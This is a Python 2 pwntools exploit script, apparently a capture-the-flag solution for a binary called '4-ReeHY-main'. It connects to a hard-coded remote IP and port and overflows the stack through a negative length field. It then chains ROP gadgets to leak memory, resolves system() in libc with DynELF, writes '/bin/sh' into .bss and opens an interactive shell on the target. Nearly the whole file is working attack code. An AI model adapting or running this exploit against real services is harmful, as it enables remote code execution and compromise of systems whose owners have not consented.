import pwn
import traceback
# Target binary plus the static addresses the two chains below are built from.
# The literal 0x4xxxxx gadget addresses imply a non-PIE build, so GOT slots and
# gadgets are fixed at link time; PIE (with ASLR) is the mitigation that would
# force an extra leak for every one of these constants.
e = pwn.ELF('4-ReeHY-main')
write_len = 0x200  # bytes asked for on every leak() round-trip
write_got, memcpy_got, read_got = (e.got[name] for name in ("write", "memcpy", "read"))
gadget1 = 0x00400D9A  # pop rbx/rbp/r12/r13/r14/r15; ret  (per com_gadget's notes)
gadget2 = 0x00400D80  # call through [rbx + r12 + 0x8]     (per com_gadget's notes)

# Session setup: banner, a name, ten menu lines, then the choice that leads
# to the vulnerable input path. Host and port are the original's target.
s = pwn.remote('211.159.216.90', 51888)
r = s.recvuntil('\n')
print(r)
s.send("lcys")
r = s.recvlines(10)
for row in r:
    print(row)
s.send("1")
r = s.recvuntil('\n')
print(r)
# Address each chain returns into afterwards; the name suggests it re-enters
# the vulnerable function so the next payload can be sent -- confirm.
vulfun_addr = 0x004009D1
def com_gadget(part1, part2, jmp2, arg1 = 0x0, arg2 = 0x0, arg3 = 0x0):
    """Return one call frame for the two-gadget dispatcher as a str.

    ``part1`` pops rbx, rbp, r12, r13, r14, r15 and returns; ``part2`` then
    calls through ``[rbx + r12 + 0x8]`` (per the original gadget notes), which
    is why ``jmp2`` -- the GOT slot to dispatch through -- lands in r12 with
    rbx = 0 and rbp = 1. r13/r14/r15 carry ``arg3``/``arg2``/``arg1``, i.e. the
    third, second and first C argument. The 56 filler bytes at the end
    presumably re-balance the pops ``part2`` performs before its own ret
    (the original only labels them "junk").
    """
    # Word order is exactly the pop order of part1, followed by part2 itself.
    frame = [part1, 0x0, 0x1, jmp2, arg3, arg2, arg1, part2]
    payload = ''.join(pwn.p64(word) for word in frame)
    payload += 'A' * 56
    return payload
def leak(address):
    """DynELF leak callback: return up to ``write_len`` bytes read from ``address``.

    One overflow payload does three things in sequence: a one-byte memcpy from
    0x00400A9C to 0x006020AC (its purpose is not explained on this page), a
    write(1, address, write_len) that sends the target bytes back over the
    socket, and a return into ``vulfun_addr`` so the process stays alive for
    the next leak. The ``pay_head`` prefix is a negative length field ("-%d")
    padded to 10 bytes plus a menu choice padded to 10 bytes -- presumably the
    service mishandles a negative length; confirm against the binary.

    On any failure the whole script exits via the bare ``except`` below, so a
    single broken leak stops the DynELF walk rather than returning bad data.
    """
    # Frame filler before the chain; the offsets are specific to this binary's
    # stack layout and are taken verbatim from the original.
    pay = "A" * (0x90 - 8)
    pay += pwn.p64(0x0)
    pay += "A" * 8
    # call memcpy(0x006020AC, 0x00400A9C, 1)
    pay += com_gadget(gadget1, gadget2, memcpy_got, 0x006020AC, 0x00400A9C, 0x1)
    # call write(1, address, write_len) -- the leaked bytes arrive on the socket
    pay += com_gadget(gadget1, gadget2, write_got, 0x1, address, write_len)
    pay += pwn.p64(vulfun_addr)  # return into the vulnerable function again
    paylen = "-%d" % len(pay)
    pay_head = paylen
    pay_head += "\0" * (0xA - len(paylen))  # length field padded to 10 bytes
    pay_head += "1"
    pay_head += "\0" * 9  # menu field padded to 10 bytes
    payload = pay_head + pay
    try:
        s.send(payload)
        print(len(payload))
        r = s.recvuntil("content\n")  # skip the service's echo up to the marker
        # NOTE(review): a single recv may return fewer than write_len bytes;
        # the slice below does not change that, so callers may see short reads.
        buf = s.recv(write_len)
        data = buf[:write_len]
        # 'hex' is a Python 2 str codec (this script is Python 2 throughout).
        pwn.log.info("%#x => %s" % (address, (data or '').encode('hex')))
    except:
        # NOTE(review): a bare except also swallows SystemExit/KeyboardInterrupt;
        # `except Exception:` would be the narrower choice. Exiting here looks
        # deliberate, since DynELF cannot continue once a leak fails.
        traceback.print_exc()
        print("%#x" % address)
        exit(0)
    return data
# Resolve system() in the remote libc by walking it through the leak()
# primitive (no libc copy needed), then stage "/bin/sh" in .bss and call it.
d = pwn.DynELF(leak, elf=e)
system_addr = d.lookup('system', 'libc.so')
print("system_addr=" + hex(system_addr))
bssaddr = 0x00602080   # writable scratch area that receives the command string
pop_rdi = 0x00400da3   # pop rdi; ret (per its name)
sh_addr = system_addr  # not used below; kept as in the original
sh = "/bin/sh\0"

# Second chain: read(0, bssaddr, len(sh)) pulls the string off the socket,
# then pop rdi / bssaddr / system performs the call. Same frame filler and
# negative-length header as leak().
chain = ["A" * (0x90 - 8), pwn.p64(0x0), "A" * 8]
chain.append(com_gadget(gadget1, gadget2, read_got, 0x0, bssaddr, len(sh)))
chain.extend(pwn.p64(word) for word in (pop_rdi, bssaddr, system_addr))
pay = "".join(chain)
paylen = "-%d" % len(pay)
pay_head = "".join([paylen, "\0" * (0xA - len(paylen)), "1", "\0" * 9])
s.send(pay_head + pay)
s.send(sh)  # consumed by the read() in the chain
s.interactive()